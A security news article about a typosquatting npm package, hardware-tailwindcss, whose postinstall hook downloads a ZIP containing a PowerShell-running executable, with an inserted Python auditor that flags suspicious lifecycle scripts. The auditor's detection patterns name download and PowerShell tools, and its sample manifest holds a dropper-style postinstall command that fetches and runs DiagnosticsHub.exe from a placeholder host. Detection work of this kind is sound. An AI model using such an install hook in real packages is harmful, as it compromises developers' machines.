A malicious npm package has been discovered posing as the legitimate software library for Material Tailwind, once again highlighting attempts by threat actors to distribute malicious code through open source software repositories.
Material Tailwind is a CSS-based framework advertised by its maintainers as an "easy-to-use component library for Tailwind CSS and Material Design".
"The malicious Material Tailwind npm package, while posing as a useful development tool, has an automatic post-installation script," said Karlo Zanki, security researcher at ReversingLabs, in a report shared with The Hacker News.
This post-install script is designed to download a password-protected ZIP archive that contains a Windows executable capable of running PowerShell scripts.
The malicious package, named hardware-tailwindcss, has been downloaded 320 times to date, all of which took place on September 15, 2022.
In a tactic that is becoming increasingly common, the threat actor appears to have taken great pains to mimic the functionality provided by the original package, while stealthily using a post-installation script to introduce the malicious functionality.
That functionality takes the form of a ZIP file fetched from a remote server; the archive embeds a Windows binary named "DiagnosticsHub.exe", presumably in an effort to pass off the payload as a diagnostic utility.
[Figure: Code for step 2 download]
The executable contains PowerShell code snippets responsible for command-and-control communication, manipulating processes, and establishing persistence through a scheduled task.
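The attack chain described above hinges on npm's install-time lifecycle hooks (preinstall, install, postinstall), which run arbitrary commands on the developer's machine as soon as a package is installed. The following auditor is an added example, not code from the article or from the ReversingLabs report: it walks a node_modules tree, reads each package.json, and flags lifecycle scripts that contain indicators typical of a dropper (remote download, archive extraction, PowerShell invocation, a bundled .exe). The indicator list, the sample manifests and the package names in them are constructed for illustration.

```python
"""Audit npm package manifests for suspicious install-time lifecycle scripts.

Added example (not part of the original article or the ReversingLabs report).
The indicator patterns below are a starting point, not a complete signature set.
"""
import json
import re
import tempfile
from pathlib import Path

# npm runs these hooks automatically during `npm install`.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Constructed indicator list; tune it to your environment.
SUSPICIOUS_PATTERNS = {
    "remote_download": re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr|https?://)", re.I),
    "archive_extract": re.compile(r"\b(unzip|tar\s+-x|Expand-Archive|7z)\b", re.I),
    "powershell": re.compile(r"\bpowershell(\.exe)?\b|\bpwsh\b", re.I),
    "windows_exe": re.compile(r"\.exe\b", re.I),
    "node_eval": re.compile(r"\bnode\s+-e\b", re.I),
}


def audit_manifest(manifest: dict) -> dict:
    """Return {hook: [indicator names]} for every lifecycle hook that matches."""
    findings = {}
    scripts = manifest.get("scripts") or {}
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str):
            continue
        hits = [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(cmd)]
        if hits:
            findings[hook] = hits
    return findings


def audit_tree(root: Path) -> list:
    """Audit every package.json under root (nested node_modules included)."""
    results = []
    for manifest_path in sorted(root.rglob("package.json")):
        try:
            manifest = json.loads(manifest_path.read_text(encoding="utf-8"))
        except (OSError, json.JSONDecodeError):
            continue  # unreadable or not a real manifest; skip rather than crash
        findings = audit_manifest(manifest)
        if findings:
            results.append({
                "package": manifest.get("name", manifest_path.parent.name),
                "version": manifest.get("version", "?"),
                "path": str(manifest_path),
                "findings": findings,
            })
    return results


# Constructed manifests (hypothetical package names; example.invalid is a reserved
# non-resolving domain). The first mimics the dropper-style postinstall the
# article describes; the second is a benign build step.
SAMPLE_SUSPICIOUS = {
    "name": "example-typosquat",
    "version": "1.0.0",
    "scripts": {
        "postinstall": "node -e \"require('child_process').execSync("
                       "'curl -o payload.zip http://example.invalid/a.zip "
                       "&& unzip -P pw payload.zip && DiagnosticsHub.exe')\""
    },
}
SAMPLE_BENIGN = {
    "name": "example-clean",
    "version": "2.0.0",
    "scripts": {"postinstall": "node scripts/build-tokens.js"},
}


def run_demo() -> list:
    """Write both samples into a throwaway node_modules tree and audit it."""
    root = Path(tempfile.mkdtemp()) / "node_modules"
    for sample in (SAMPLE_SUSPICIOUS, SAMPLE_BENIGN):
        pkg_dir = root / sample["name"]
        pkg_dir.mkdir(parents=True)
        (pkg_dir / "package.json").write_text(json.dumps(sample), encoding="utf-8")
    return audit_tree(root)


if __name__ == "__main__":
    for hit in run_demo():
        print(f"{hit['package']}@{hit['version']}: {hit['findings']}")
```

Run it against a checked-out project's node_modules by calling `audit_tree(Path("node_modules"))`. As a preventive control, npm's real `--ignore-scripts` flag (`npm install --ignore-scripts`, or `npm config set ignore-scripts true`) stops lifecycle hooks from executing at all, which blocks this class of post-install dropper outright; packages that genuinely need a build step can then be handled explicitly.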
The attack also highlights the software supply chain as an attack surface, one that has grown in prominence because of the cascading impact attackers can achieve by distributing malicious code that affects multiple platforms and enterprise environments at once.
Supply chain threats also prompted the U.S. government to issue a memo directing federal agencies to "use only software that meets secure software development standards" and to obtain "self-attestation for all third-party software".
"Ensuring software integrity is critical to protecting federal systems against threats and vulnerabilities and reducing the overall risk of cyberattacks," the White House said last week.